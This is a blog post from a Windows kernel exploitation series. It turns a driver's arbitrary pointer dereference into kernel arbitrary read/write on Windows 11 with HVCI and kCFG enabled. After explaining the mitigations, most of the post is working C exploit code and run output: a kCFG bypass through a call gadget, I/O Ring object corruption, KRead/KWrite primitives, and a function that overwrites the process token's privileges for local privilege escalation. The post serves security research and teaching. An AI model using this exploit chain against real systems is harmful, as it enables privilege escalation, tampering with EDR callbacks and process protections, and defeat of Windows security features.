From arbitrary pointer dereference to arbitrary read/write in latest Windows 11

In the last part of this Windows kernel exploitation series, we successfully exploited an arbitrary pointer dereference, bypassing SMEP and KVA Shadowing to finally obtain arbitrary code execution in kernel mode.

However, on the latest Windows 11 some security features part of Virtualization-Based Security are enabled by default and are going to mitigate our exploit. The security features that we will have to face are Hypervisor-protected code integrity, a.k.a HVCI or Memory integrity, and kernel Control Flow Guard (kCFG).

In this article we will briefly examine what VBS, HVCI, and kCFG are and modify our original exploit code in a way that allows us to turn our arbitrary pointer dereference into an arbitrary read/write primitive, that in turn allows us to perform data-only attacks, such as elevating token privileges, swapping token addresses, disabling EDR kernel callbacks or setting/unsetting PPL features of an arbitrary process, just to mention a few possibilities.

Note: I started working on this article before the release of Windows 11 24h2. Windows 11 24h2 removed several kernel address leak vulnerabilities (still available if you have the SeDebugPrivilege, that is if you are an Administrator) that are leveraged in this article.

Setting up the environment

If you want to follow on your own, you should follow the instructions below to create a Windows 11 VM with VBS enabled on VMware. First, in the Settings of your host machine look for Core isolation and disable Memory integrity. After that, in VMware go into the Virtual Machine Settings > Options > Advanced menu and check Enable VBS Support.

Notice this will enable also Secure Boot. If Secure Boot is enabled you won’t be able to do kernel debugging. To disable it, while keeping VBS enabled, navigate to the folder of your VM and open the .vmx file in a text editor. Change the attribute uefi.secureBoot.enabled to FALSE.

Now, run your VM and inside it open Settings, navigate to Core isolation and set Memory integrity to enabled.

Restart the VM. Now your VM should have HVCI and kCFG enabled but Secure Boot disabled, allowing you to setup kernel debugging.

VBS, HVCI, and kCFG

Let’s first understand what VBS, HVCI, and kCFG are and what are their implications when it comes to exploit development. The following blog posts authored by Connor McGarr are very good to shed light on this topic:

Virtualization Based Security

Virtualization-based security (VBS), uses hardware virtualization and the Windows hypervisor to create an isolated virtual environment that becomes the root of trust of the OS that assumes the kernel can be compromised. Windows uses this isolated environment to host a number of security solutions, such as HVCI and Credential Guard.

The idea is that VBS, using the hypervisor, creates two Virtual Trust Levels (VTLs), isolated environments similar to virtual machines (but they are NOT exactly virtual machines):

Virtual Trust Level 0 (VTL0): An environment that hosts the “regular kernel”, that is ntoskrnl.exe. This is the environment the user interacts with, so it is where user-mode programs are executed, including our exploit.
Virtual Trust Level 1 (VTL1): An environment that hosts the “secure kernel” that is securekernel.exe.

Virtual Trust Levels. Source: Connor McGarr’s blog.

VTL1 is the more privileged environment while VTL0 is the less privileged environment. When the system boots and both environments are loaded, VTL1 is allowed to configure VTL0 by calling the “APIs” offered by the hypervisor, issuing hypercalls.

Relationships between VTL hypervisor and SLAT. Source: *Windows Internals 7th edition* book.

Secondary Layer Address Translation

Secondary Layer Address Translation or SLAT allows each VM to run in its own address space in the eyes of the hypervisor. Intel’s implementation of SLAT is known as Extended Page Tables, or EPT (see here).

The idea is that when a VM tries to access memory at a given virtual address VA, the VM uses its own set of Page Table Entries or PTEs, to translate the VA to an address known as Guest Physical Address or GPA (in the following image ignore the last step of accessing the RAM).

Virtual address to physical address translation (x64 arch). Source: *Windows Internals 7th edition* book.

A GPA is still NOT a valid physical address. Therefore, the hypervisor “intercepts” the access to the GPA and uses its own special set of PTEs known as Extended Page Table Entries EPTEs to translate the GPA to a system physical address or SPA.

GPA to SPA translation. Source: Rayanfam’s Blog.

The SPA is the final physical address in RAM.

Therefore, the real state of physical memory pages is described by EPTEs and NOT by PTEs when the hypervisor is running.

If you want to dive deeper on this topic I recommend the Hypervisor from scratch series from Rayanfam’s blog.

HVCI

Hypervisor-protected code integrity (HVCI) is a virtualization-based security (VBS) feature available in Windows 10, Windows 11, and Windows Server 2016 and later.

In a few words, it consists of securekernel.exe (running in VTL1) that, at boot time, works with the hypervisor to create a set of EPTEs that describe the final view of physical memory while the OS in VTL0 (ntoskrnl.exe) maintans its own view of memory.

Basically all EPTEs are configured in a way that all pages are either readable and writable, RW- or readable and executable R-X but NEVER writable-executable -WX or readable-writable-executable RWX.

So, supposing an attacker does the following:

Store the shellcode in a kernel memory page at virtual address VA.
Exploit a vulnerability (arbitrary write, arbitrary pointer dereference, etc.) that allows to set the Execute bit in the corresponding PTE of virtual address VA.
Trigger shellcode execution at virtual address VA.

The exploit will fail because the CPU, at high level, does the following:

Convert the VA to a GPA (guest physical address), noticing the PTE has the Execute bit set (it was tampered by the attacker at step 2 above).
The GPA is passed to the hypervisor that converts it in SPA and notices that the corresponding EPTE doesn’t have the Execute bit set.
Therefore, execution is halted and the exploit fails.

EPTEs can be thought as another mapping of virtual memory to physical memory that CANNOT be tampered by the attacker. In fact GPA and SPA will have the same value as the purpose of HVCI is just making sure an attacker cannot execute arbitrary shellcode in kernel-mode.

Another exploit dealing with PTEs is setting the U/S bit of a user-mode page to S, or Supervisor (this is in fact what we did in a previous blog post). This way, when the CPU is running in kernel-mode (CPL = 0), it is allowed to execute the shellcode in the page, bypassing SMEP. EPTEs do not have a U/S bit, therefore they can’t prevent such scenario.

However, Intel introduced the hardware solution known as Mode-Based Execution Control, or MBEC, to mitigate this attack. The general idea is setting all user-mode pages in the EPTEs as NON executable when CPU is running in kernel-mode. Microsoft introduced Restricted User Mode, or RUM as a software solution, in case the hardware doesn’t support MBEC.

At this point, I hope I didn’t confuse you. If it is the case, I encourage you to read the whole Connor’s blog post on HVCI. At the end of the day, as Connor already highlight in his blog post, the HVCI’s impact on exploit development is the following:

PTE manipulation to achieve unsigned-code execution is impossible
Any unsigned-code execution in the kernel is impossible

So, let’s think about our arbitrary pointer dereference. We can’t craft anymore a ROP chain that tampers with the PTEs, as it would be useless with HVCI.

However, we still have the full set of kernel APIs available. For example, we could craft a ROP chain that overwrites the _KTHREAD.PreviousMode field of the thread to obtain arbitrary read/write primitives in the kernel (well explained in the OST2 – Exp4011 course, taught by Cedric Halbronn).

The issue is that we CAN’T craft ROP chains (in this way) due to kernel Control Flow Guard (kCFG).

kCFG

In a few words, every time there is an indirect function call, as in our case, the function call goes through the nt!_guard_dispatch_icall routine. The routine does the following:

Checks if the target function is valid.
If It is valid, it jumps to the target function.
If it is not valid, the kernel halts execution and there is a BSOD.

For kCFG, every address corresponding to the beginning of a function is considered a valid target.

It is also worth noticing that kCFG is only enabled when HVCI is enabled. kCFG uses a bitmap to validate the target. The bitmap is read-only, and this is enforced by HVCI.

When HVCI is not enabled, the indirect function calls still go through the nt!_guard_dispatch_icall routine. However, the routine just checks if the address resides in user-space ( from 0to 0x000007FFFFFEFFFF) or in kernel-space (from 0x0000080000000000 to 0xFFFFFFFFFFFFFFFF). In case the address resides in user-space, it halts the execution and triggers a BSOD.

Indeed, If you remember part 2 of this series, when we tried to hijack execution to address 0xdeadbeef we got a BSOD. That was kCFG with HVCI disabled. If you want to understand more in detail CFG, I suggest you to start from the following blog post, again authored by Connor McGarr.

So, the impact of kCFG with HVCI enabled is that we CAN’T hijack execution to arbitrary addresses in ntoskrnl.exe preventing us from crafting arbitrary ROP chains. However, we can still hijack execution to the beginning of any function in ntoskrnl.exe.

Crafting our new exploit

Now that we have an idea of what is the impact of the new security mitigations enabled by Microsoft, we can start thinking about how we can modify our exploit in order to achieve LPE.

“Relaxing” the constraints

In the previous exploit, I didn’t use any function such as EnumDeviceDrivers() or NtQuerySystemInformation() to leak kernel addresses. In this case, instead, we are going to use NtQuerySystemInformation() to obtain LPE with kCFG/HVCI enabled.

Note: Starting from Windows 11 24h2, EnumDeviceDrivers() and NtQuerySystemInformation() require the SeDebugPrivilege to obtain kernel addresses. This means you must be an Administrator in order to use them on the latest Windows 11 version. Of course, this is already a requirement for a BYOVD attack scenario.

Bypassing kCFG

The starting point is always looking for research papers/blog post from researchers that already had to deal with such a scenario. After a while, I’ve found a really good blog post authored by @tykawaii98 and @void_sec. The vulnerability class is again an arbitrary pointer dereference that allows to hijack the execution flow.

The idea to bypass kCFG is basically finding a function that allows us to perform a data-only attack based on the registers we control when we reach the indirect function call.

Recalling the end of part 2 of this series: “At this point we know we can redirect execution to an arbitrary address and that we control registers RBX, RCX and RDI“. So, we control RBX, RCX and RDI at the moment of the indirect call.

The authors of the blog post discovered nt!DbgkpTriageDumpRestoreState().

Disassembly of nt!DbgkpTriageDumpRestoreState

In a few words, the interesting things that this function does are the following:

move the value from [RCX] to RDX
move the 4 byte value from [RCX+0x10] to EAX
store EAX(with EAX=[RCX+0x10]) at [RDX+0x2078] (with RDX=[RCX])
move the 4 byte value from [RCX+0x14] to EAX
store EAX(with EAX=[RCX+0x14]) at [RDX+0x207c] (with RDX=[RCX])

In other words, we can write an 8 byte value at [RCX+0x10], to the address at [RDX+0x2078], where RDX is [RCX]. So we have an arbitrary 8 bytes write by just controlling RCX. As we control RCX, this function is perfect for our purposes.

Getting arbitrary read/write

In the same article from Crowdfense, the authors show two ways to use this gadget:

Set _KTHREAD.PreviousMode field of the thread to obtain arbitrary read/write of kernel-space memory.
Overwrite the _TOKEN.Privileges.Present field of the current process token adding all privileges to ourselves (basically the same we did in part 3 but with a shellcode).

On the other hand, I decided to use the I/O Ring technique to obtain arbitrary read/write primitives in kernel-space. Why? mainly because:

It looks like Microsoft is about to mitigate the _KTHREAD.PreviousMode technique (it was outlined in this presentation and in this post, it seems anyway it will take some time).
Overwriting the _TOKEN.Privileges.Present allows us to only elevate our privileges. We can’t disable EDR callbacks or unset/set PPL attributes for processes, both attacks are instead possible with arbitrary read/write.
Just playing with I/O Rings.

I/O Ring technique was discovered and documented by Yarden Shafir and later on also described by Ruben Boonen.

Some pieces of code were brutally copy/pasted from Yarden’s repo.

At a high level, the idea is the following:

Allocate an IoRing (_IORING_OBJECT structure in kernel) using the CreateIoRing() API.
Call BuildIoRingRegisterBuffers() so that _IORING_OBJECT.RegBuffers and _IORING_OBJECT.RegBuffersCount are initialized.
Exploit our arbitrary pointer dereference to overwrite _IORING_OBJECT.RegBuffers.
Call BuildIoRingReadFile() to write to an arbitrary kernel address and BuildIoRingWriteFile() to read from an arbitrary kernel address.

So, let’s start modifying the exploit.

Before calling our arbitraryCallDriver(), we place a call to a routine named prepare() that does the following:

Create the _IORING_OBJECT (call to CreateIoRing()) and save the returned pointer to user-mode object in puioring.
Set _IORING_OBJECT.RegBuffers to a dummy array and _IORING_OBJECT.RegBuffersCount to 1 using BuildIoRingRegisterBuffers() and SubmitIoRing() (we have to call every time SubmitIoRing() to perform any operation).
Call GetKAddrFromHandle() to obtain the kernel address of the IoRing object from the handle and save the result in ioringaddress. GetKAddrFromHandle() is another routine created by us that internally calls NtQuerySystemInformation() to obtain the kernel address.
Allocate an array containing 1 pointer to a _IOP_MC_BUFFER_ENTRY, named fake_buffers. We will exploit the vulnerability to overwrite _IORING_OBJECT.RegBuffers with fake_buffers.
Instantiate all the named pipes that will be necessary to exploit the arbitrary read/write offered by IoRing.

[...]
    #define REGBUFFERCOUNT 0x1
    [...]
    HANDLE g_device;
    PUIORING puioring = NULL;
    PVOID ioringaddress = NULL;
    HIORING handle = NULL;
    PIOP_MC_BUFFER_ENTRY* fake_buffers = NULL;
    UINT_PTR userData = 0x41414141;
    ULONG numberOfFakeBuffers = 100;
    PVOID addressForFakeBuffers = NULL;
    HANDLE inputPipe = INVALID_HANDLE_VALUE;
    HANDLE outputPipe = INVALID_HANDLE_VALUE;
    HANDLE inputClientPipe = INVALID_HANDLE_VALUE;
    HANDLE outputClientPipe = INVALID_HANDLE_VALUE;
    IORING_BUFFER_INFO preregBuffers[REGBUFFERCOUNT] = { 0 };
    [...]
    PVOID
    AllocateFakeBuffersArray(
        _In_ ULONG NumberOfFakeBuffers
    )
    {
        ULONG size;
        PVOID* fakeBuffers;
    
        
        //
        // This will be an array of pointers to IOP_MC_BUFFER_ENTRYs
        //
    
    
        fakeBuffers = (PVOID*)VirtualAlloc(NULL, NumberOfFakeBuffers * sizeof(PVOID), MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
        if (fakeBuffers == NULL)
        {
            printf("[-] Failed to allocate fake buffers array\n");
            return NULL;
        }
        if (!VirtualLock(fakeBuffers, NumberOfFakeBuffers * sizeof(PVOID)))
        {
            printf("[-] Failed to lock fake buffers array\n");
            return NULL;
        }
        memset(fakeBuffers, 0, NumberOfFakeBuffers * sizeof(PVOID));
        for (int i = 0; i < NumberOfFakeBuffers; i++)
        {
            fakeBuffers[i] = VirtualAlloc(NULL, sizeof(IOP_MC_BUFFER_ENTRY), MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
            if (fakeBuffers[i] == NULL)
            {
                printf("[-] Failed to allocate fake buffer\n");
                return NULL;
            }
            if (!VirtualLock(fakeBuffers[i], sizeof(IOP_MC_BUFFER_ENTRY)))
            {
                printf("[-] Failed to lock fake buffer\n");
                return NULL;
            }
            memset(fakeBuffers[i], 0x41, sizeof(IOP_MC_BUFFER_ENTRY));
        }
        
        printf("[*] fakeBuffers = 0x%p\n", fakeBuffers);
        for (int i = 0; i < NumberOfFakeBuffers; i++) {
            printf("[*] fakeBuffers[%d] = 0x%p\n", i, fakeBuffers[i]);
        }
    
        return fakeBuffers;
    }
    
    BOOL prepare() {
        HRESULT result;
        IORING_CREATE_FLAGS flags;
    
        flags.Required = IORING_CREATE_REQUIRED_FLAGS_NONE;
        flags.Advisory = IORING_CREATE_ADVISORY_FLAGS_NONE;
        
        result = CreateIoRing(IORING_VERSION_3, flags, 0x10000, 0x20000, (HIORING*)&handle);
        if (!SUCCEEDED(result))
        {
            printf("[-] Failed creating IO ring handle: 0x%x\n", result);
            return FALSE;
        }
        puioring = (PUIORING)handle;
        printf("[+] Created IoRing. handle=0x%p\n", puioring);
        //pre-register buffer array with len=1
        preregBuffers[0].Address = VirtualAlloc(NULL, 0x100, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
        if (!preregBuffers[0].Address)
        {
            printf("[-] Failed to allocate prereg buffer\n");
            return FALSE;
        }
        memset(preregBuffers[0].Address, 0x41, 0x100);
        preregBuffers[0].Length = 0x100;
        result = BuildIoRingRegisterBuffers(handle, REGBUFFERCOUNT, preregBuffers, 0);
        if (!SUCCEEDED(result))
        {
            printf("[-] Failed BuildIoRingRegisterBuffers: 0x%x\n", result);
            return FALSE;
        }
        UINT32 submitted = 0;
        result = SubmitIoRing(handle, 1, INFINITE, &submitted);
        if (!SUCCEEDED(result)) {
            printf("[-] Failed SubmitIoRing: 0x%x\n", result);
            return FALSE;
        }
        printf("[*] submitted = 0x%d\n", submitted);
        ioringaddress = GetKAddrFromHandle(puioring->handle);
        printf("[*] ioringaddress = 0x%p\n", ioringaddress);
        
        fake_buffers = (PIOP_MC_BUFFER_ENTRY*)AllocateFakeBuffersArray(
            REGBUFFERCOUNT
            );
        if (fake_buffers == NULL)
        {
            printf("[-] Failed to allocate fake buffers\n");
            return FALSE;
        }
    
        //
        // Create named pipes for the input/output of the I/O operations
        // and open client handles for them
        //
        inputPipe = CreateNamedPipe(INPUT_PIPE_NAME, PIPE_ACCESS_DUPLEX, PIPE_WAIT, 255, 0x1000, 0x1000, 0, NULL);
        if (inputPipe == INVALID_HANDLE_VALUE)
        {
            printf("[-] Failed to create input pipe: 0x%x\n", GetLastError());
            return FALSE;
        }
        outputPipe = CreateNamedPipe(OUTPUT_PIPE_NAME, PIPE_ACCESS_DUPLEX, PIPE_WAIT, 255, 0x1000, 0x1000, 0, NULL);
        if (outputPipe == INVALID_HANDLE_VALUE)
        {
            printf("[-] Failed to create output pipe: 0x%x\n", GetLastError());
            return FALSE;
        }
    
        outputClientPipe = CreateFile(OUTPUT_PIPE_NAME,
            GENERIC_READ | GENERIC_WRITE,
            FILE_SHARE_READ | FILE_SHARE_WRITE,
            NULL,
            OPEN_ALWAYS,
            FILE_ATTRIBUTE_NORMAL,
            NULL);
    
        if (outputClientPipe == INVALID_HANDLE_VALUE)
        {
            printf("[-] Failed to open handle to output file: 0x%x\n", GetLastError());
            return FALSE;
        }
    
        inputClientPipe = CreateFile(INPUT_PIPE_NAME,
            GENERIC_READ | GENERIC_WRITE,
            FILE_SHARE_READ | FILE_SHARE_WRITE,
            NULL,
            OPEN_ALWAYS,
            FILE_ATTRIBUTE_NORMAL,
            NULL);
    
        if (inputClientPipe == INVALID_HANDLE_VALUE)
        {
            printf("[-] Failed to open handle to input pipe: 0x%x\n", GetLastError());
            return FALSE;
        }
    
        return TRUE;
    }
    [...]
    int main()
    {
    [...]
        if (!prepare())
            return -1;
    
        arbitraryCallDriver(outputBuffer, SIZE_BUF);
        printf("[+] arbitraryCallDriver returned successfully.\n");
    [...]
    }

Now, let’s modify our arbitraryCallDriver(). Recall from the end of part 2 that at the moment of the jmp rax instruction, we control RCX. RCX corresponds to object2+0x30 that it is also ptr->AttachedDevice.

First of all, we change the code in a way that we are able to hijack the execution flow to nt!DbgkpTriageDumpRestoreState, the call gadget useful for bypassing kCFG.

[...]
        * ((PDWORD64)pDriverFunction) = g_ntbase + 0x7f06a0;   //address of DbgkpTriageDumpRestoreState
[...]

Later on, we have to set fake_buffers, that is the value that we want to write, at ptr->AttachedDevice+0x10 (remember rcx = ptr->attachedDevice) that is ptr->AttachedDevice->NextDevice (recall that ptr->AttachedDevice points to a _DEVICE_OBJECT struct).

[...]
        //ptr->AttachedDevice corresponds to rcx when we hijack execution to DbgkpTriageDumpRestoreState
        ptr->AttachedDevice->NextDevice = (_DEVICE_OBJECT*)fake_buffers;  //value of arbitrary write. address of fakeBuffers
[...]

We must then set RDX in a way that rdx+0x2078 points to the kernel address we want to write to, that is _IORING_OBJECT.RegBuffers.

[...]
        //offset 0x0 (AttachedDevice->Type,Size,ReferenceCount) we store the address that is stored in rdx by DbgkpTriageDumpRestoreState
        PDWORD64 prdx_val = (PDWORD64)ptr->AttachedDevice;
        *prdx_val = (DWORD64)ioringaddress + 0xb8 - 0x2078; //address of RegBuffers in ioring kernel structure
        printf("[*] prdx_val = 0x%p\n", prdx_val);
[...]

Finally, after calling DeviceIoControl(), we must update the user-mode IoRing struct so that it matches with the corresponding kernel-mode _IORING_OBJECT struct.

[...]
        BOOL res = DeviceIoControl(
            g_device,
            IOCTL_ARBITRARYCALLDRIVER,
            inputBuffer,
            SIZE_BUF,
            outputBuffer,
            outSize,
            &bytesRet,
            NULL
        );
    
        printf("[*] sent IOCTL_ARBITRARYCALLDRIVER \n");
        if (!res) {
            printf("[-] DeviceIoControl failed with error: %d\n", GetLastError());
        }
    
        //update regBuffer address and size in usermode ioring
        puioring->RegBufferArray = fake_buffers;
        puioring->BufferArraySize = REGBUFFERCOUNT;
[...]

Now, let’s place a getchar() call before and after triggering the vulnerability and run the exploit.

PS Microsoft.PowerShell.Core\FileSystem::\\vmware-host\Shared Folders\Debug> .\DrvExpTemplate.exe
    [+] Opened handle to device: 0x00000000000000FC
    [+] User buffer allocated: 0x0000025258D70000
    [*] sent IOCTL_READMSR
    [+] readMSR success.
    [+] IA32_LSTAR = 0xFFFFF80469A2B700
    [+] g_ntbase = 0xFFFFF80469600000
    [+] Created IoRing. handle=0x0000025258B141C0
    [*] submitted = 0x1
    [*] ioringaddress = 0xFFFFE5063F4F8900
    [*] fakeBuffers = 0x0000025258D90000
    [*] fakeBuffers[0] = 0x0000025258DA0000
    [+] object = 0x0000001AFEFF0000
    [+] second object = 0x0000001AFEFFFFD0
    [+] ptr = 0x0000001AFF000000
    [+] object2 = 0x0000025258DC0000
    [+] driverObject = 0x0000025258DD0000
    [+] ptr->AttachedDevice = 0x0000025258DC0030
    [*] prdx_val = 0x0000025258DC0030
    [+] User buffer allocated: 0x0000025258DB0000

From the output we can see our _IORING_OBJECT was allocated at kernel-space address ioringaddress = 0xFFFFE5063F4F8900. Our fake_buffers array is at user-space address 0x0000025258D90000 and has only one entry, fake_buffers[0], that contains the user-space address 0x0000025258DA0000, that points to our fake _IOP_MC_BUFFER_ENTRY struct.

Now let’s inspect the allocated _IORING_OBJECT in the kernel with WinDbg.

_IORING_OBJECT before triggering the vulnerability.

We can see that _IORING_OBJECT.RegBuffersCount field was successfully set to 1.

Now let’s press enter to trigger the vulnerability and re-inspect the _IORING_OBJECT in WinDbg.

_IORING_OBJECT after triggering the vulnerability.

As we can see, we were able to successfully overwrite _IORING_OBJECT.RegBuffers with the user-space address of fake_buffers.

Now, every time we want to read from/write to a kernel-space address we just need to set the fields _IOP_MC_BUFFER_ENTRY.Address and _IOP_MC_BUFFER_ENTRY.Length at address fake_buffers[0] and call BuildIoRingReadFile()/BuildIoRingWriteFile().

Crafting our read/write primitives

Now that we’ve successfully overwritten the RegBuffers field, we can create two functions KRead() and KWrite() that use the IoRing object to read and write arbitrary data in kernel-space.

Let’s start with KRead(). It takes as input:

TargetAddress: the kernel-space address we want to read from.
pOut: a buffer allocated by the caller where the function saves the data read.
size: the amount of bytes to read from TargetAddress.

It performs the following operations:

Zero-out the IOP_MC_BUFFER_ENTRY struct at fake_buffers[0] and set the TargetAddress and size in IOP_MC_BUFFER_ENTRY.Address and IOP_MC_BUFFER_ENTRY.size.
Call BuildIoRingWriteFile() and SubmitIoRing() to trigger the IoRing to read IOP_MC_BUFFER_ENTRY.size bytes from IOP_MC_BUFFER_ENTRY.Address and write them in our OutputPipe.
Read the data fromOutputPipe and copy it in pOut using ReadFile().

BOOL KRead(PVOID TargetAddress, PBYTE pOut, SIZE_T size) {
        DWORD bytesRead = 0;
        HRESULT result;
        UINT32 submittedEntries;
        IORING_CQE cqe;
    
        memset(fake_buffers[0], 0, sizeof(IOP_MC_BUFFER_ENTRY));
        fake_buffers[0]->Address = TargetAddress;
        fake_buffers[0]->Length = size;
        fake_buffers[0]->Type = 0xc02;
        fake_buffers[0]->Size = 0x80;
        fake_buffers[0]->AccessMode = 1;
        fake_buffers[0]->ReferenceCount = 1;
    
        auto requestDataBuffer = IoRingBufferRefFromIndexAndOffset(0, 0);
        auto requestDataFile = IoRingHandleRefFromHandle(outputClientPipe);
    
        result = BuildIoRingWriteFile(handle,
            requestDataFile,
            requestDataBuffer,
            size,
            0,
            FILE_WRITE_FLAGS_NONE,
            NULL,
            IOSQE_FLAGS_NONE);
        if (!SUCCEEDED(result))
        {
            printf("[-] Failed building IO ring read file structure: 0x%x\n", result);
            return FALSE;
        }
    
        result = SubmitIoRing(handle, 1, INFINITE, &submittedEntries);
        if (!SUCCEEDED(result))
        {
            printf("[-] Failed submitting IO ring: 0x%x\n", result);
            return FALSE;
        }
        printf("[*] submittedEntries = %d\n", submittedEntries);
        //
        // Check the completion queue for the actual status code for the operation
        //
        result = PopIoRingCompletion(handle, &cqe);
        if ((!SUCCEEDED(result)) || (!NT_SUCCESS(cqe.ResultCode)))
        {
            printf("[-] Failed reading kernel memory 0x%x\n", cqe.ResultCode);
            return FALSE;
        }
    
        BOOL res = ReadFile(outputPipe,
            pOut,
            size,
            &bytesRead,
            NULL);
        if (!res)
        {
            printf("[-] Failed to read from output pipe: 0x%x\n", GetLastError());
            return FALSE;
        }
        printf("[+] Successfully read %d bytes from kernel address 0x%p.\n", bytesRead,TargetAddress);
        return res;
    }

Kwrite() is actually quite similar. It takes as input:

TargetAddress: the target kernel-space address we want to write to.
pVal: a buffer holding the data we want to write.
size: the amount of bytes in pVal that we want to write.

It performs the following operations:

Write the buffer from pVal in our InputPipe.
Zero-out the IOP_MC_BUFFER_ENTRY struct at fake_buffers[0] and set the TargetAddress and size in IOP_MC_BUFFER_ENTRY.Address and IOP_MC_BUFFER_ENTRY.size.
Call BuildIoRingReadFile() and SubmitIoRing() to trigger the IoRing to read IOP_MC_BUFFER_ENTRY.size bytes from our InputPipe and write them to IOP_MC_BUFFER_ENTRY.Address.

BOOL KWrite(PVOID TargetAddress, PBYTE pValue, SIZE_T size) {

    DWORD bytesWritten = 0;
    HRESULT result;
    UINT32 submittedEntries;
    IORING_CQE cqe;

    printf("[*] Writing to %p the following bytes\n", TargetAddress);
    printf("[*] pValue = 0x%p\n", pValue);
    printf("[*] data: ");
    for (int i = 0; i < size; i++) {
        printf("0x%x ",pValue[i]);
    }
    printf("\n");
    if (WriteFile(inputPipe, pValue, size, &bytesWritten, NULL) == FALSE)
    {
        result = GetLastError();
        printf("[-] Failed to write into the input pipe: 0x%x\n", result);
        return FALSE;
    }
    printf("[*] bytesWritten = %d\n", bytesWritten);
    //
    // Setup another buffer entry, with the address of ioring->RegBuffers as the target
    // Use the client's handle of the input pipe for the read operation
    //
    memset(fake_buffers[0], 0, sizeof(IOP_MC_BUFFER_ENTRY));
    fake_buffers[0]->Address = TargetAddress;
    fake_buffers[0]->Length = size;
    fake_buffers[0]->Type = 0xc02;
    fake_buffers[0]->Size = 0x80;
    fake_buffers[0]->AccessMode = 1;
    fake_buffers[0]->ReferenceCount = 1;

    auto requestDataBuffer = IoRingBufferRefFromIndexAndOffset(0, 0);
    auto requestDataFile = IoRingHandleRefFromHandle(inputClientPipe);

    printf("[*] performing buildIoRingReadFile\n");
    result = BuildIoRingReadFile(handle,
        requestDataFile,
        requestDataBuffer,
        size,
        0,
        NULL,
        IOSQE_FLAGS_NONE);
    if (!SUCCEEDED(result))
    {
        printf("[-] Failed building IO ring read file structure: 0x%x\n", result);
        return FALSE;
    }

    result = SubmitIoRing(handle, 1, INFINITE, &submittedEntries);
    if (!SUCCEEDED(result))
    {
        printf("[-] Failed submitting IO ring: 0x%x\n", result);
        return FALSE;
    }
    printf("[*] submittedEntries = %d\n", submittedEntries);
    return TRUE;
}

Using our read/write primitives

Now it is just a matter of calling KRead()/KWrite() for reading from/writing to any kernel-space address. In this case we will just elevate our privileges, even if, as already outlined at the beginning, we could do much more.

Using this library, you can also call arbitrary kernel functions once you obtain kernel read/write primitives (it won’t work if kCET is enabled though).

So, let’s create an IncrementPrivileges() function that uses KRead()/KWrite() to read and write the token privileges of the current process.

VOID IncrementPrivileges() {
        HANDLE TokenHandle = NULL;
        PVOID tokenAddr = NULL;
        if (OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &TokenHandle))
            tokenAddr = GetKAddrFromHandle(TokenHandle);
        printf("[+] tokenHandle = 0x%p\n", TokenHandle);
        printf("[+] tokenAddr = 0x%p\n", tokenAddr);
    
        _SEP_TOKEN_PRIVILEGES original_privs = { 0 };
    
        printf("[*] Reading original token privileges...\n");
    
        KRead((PVOID)((DWORD64)tokenAddr + 0x40), (PBYTE)&original_privs, sizeof(original_privs));
        printf("[+] original_privs.Present = 0x%llx\n", original_privs.Present);
        printf("[+] original_privs.Enabled = 0x%llx\n", original_privs.Enabled);
        printf("[+] original_privs.EnabledByDefault = 0x%llx\n", original_privs.EnabledByDefault);
        //KRead64((PVOID)((DWORD64)tokenAddr + 0x40), (PDWORD64)&tokenAddr);
    
        _SEP_TOKEN_PRIVILEGES privs = { 0 };
        privs.Enabled = 0x0000001ff2ffffbc;
        privs.Present = 0x0000001ff2ffffbc;
        privs.EnabledByDefault = original_privs.EnabledByDefault;
    
        printf("[*] Writing token privileges...\n");
    #ifdef _DEBUG
        getchar();
    #endif
        KWrite((PVOID)((DWORD64)tokenAddr + 0x40), (PBYTE) & privs, sizeof(privs));
    
        printf("[*] Reading modified token privileges...\n");
        _SEP_TOKEN_PRIVILEGES modified_privs = { 0 };
        KRead((PVOID)((DWORD64)tokenAddr + 0x40), (PBYTE)&modified_privs, sizeof(modified_privs));
        printf("[+] modified_privs.Present = 0x%llx\n", modified_privs.Present);
        printf("[+] modified_privs.Enabled = 0x%llx\n", modified_privs.Enabled);
        printf("[+] modified_privs.EnabledByDefault = 0x%llx\n", modified_privs.EnabledByDefault);
        return;
    }

Cleaning up

As outlined in this blog post, when using I/O ring we have to reset _IORING_OBJECT.RegBuffers and the _IORING_OBJECT.RegBuffersCount to zero. In addition, since we pre-registered a buffer it is also recommended to decrement the reference count of the process. We are going to implement all of this in our cleanup() function.

We first get a handle to the current process, hProc and then we obtain eproc, the kernel address of the corresponding _EPROCESS struct by calling GetKAddrFromHandle(). We finally use KRead() and KWrite() to update the reference count at eproc-0x30(_EPROCESS is always preceeded by an _OBJECT_HEADER struct that keeps track of the reference count in the PointerCount field).

After that we just need to issue one last KWrite() that sets _IORING_OBJECT.RegBuffers and the _IORING_OBJECT.RegBuffersCount to zero.

VOID cleanup() {
    
        auto hProc = OpenProcess(MAXIMUM_ALLOWED, FALSE, GetCurrentProcessId());
    
        if (hProc != NULL)
        {
            auto eproc = GetKAddrFromHandle(hProc);
            printf("[+] eproc = 0x%p\n", eproc);
            DWORD64 refCount = NULL;
            if (KRead((PVOID)((DWORD64)eproc - 0x30), (PBYTE)&refCount, sizeof(DWORD64))) {
                printf("[+] refCount = 0x%llx\n", refCount);
                if (refCount > 0) {
                    printf("[*] refCount > 0\n");
                    refCount--;
                    if (KWrite((PVOID)((DWORD64)eproc - 0x30), (PBYTE)&refCount, sizeof(DWORD64))) {
                        printf("[+] refCount decremented\n");
                    }
                    else {
                        printf("[-] Failed to decrement refCount\n");
                    }
                }
                else {
                    printf("[*] refCount <= 0\n");
                }
            }
            else {
                printf("[-] Failed to read refCount\n");
            }
        }
        else {
            printf("[-] Failed to open handle to current process.\n");
        }
    
        auto towrite = malloc(16);
        memset(towrite, 0x0, 16);
        printf("[*] Cleaning up...\n");
        printf("[*] Setting RegBuffersCount and RegBuffers to 0.\n");
    #ifdef _DEBUG
        getchar();
    #endif
        if (!KWrite((PVOID)((DWORD64)ioringaddress + 0xb0), (PBYTE)towrite,16)) {
            printf("[-] cleanup failed during Kwrite64\n");
        }
        puioring->RegBufferArray = NULL;
        puioring->BufferArraySize = 0;
        if (g_device != INVALID_HANDLE_VALUE) {
            CloseHandle(g_device);
        }
        if (puioring != NULL) {
            CloseIoRing((HIORING)puioring);
        }
    }

Launching the exploit

Now we can run the exploit and notice we can successfully elevate our privileges bypassing kCFG!

Running our modified exploit and getting LPE

Full exploit code is available in the branch named vbs of the GitHub repo.

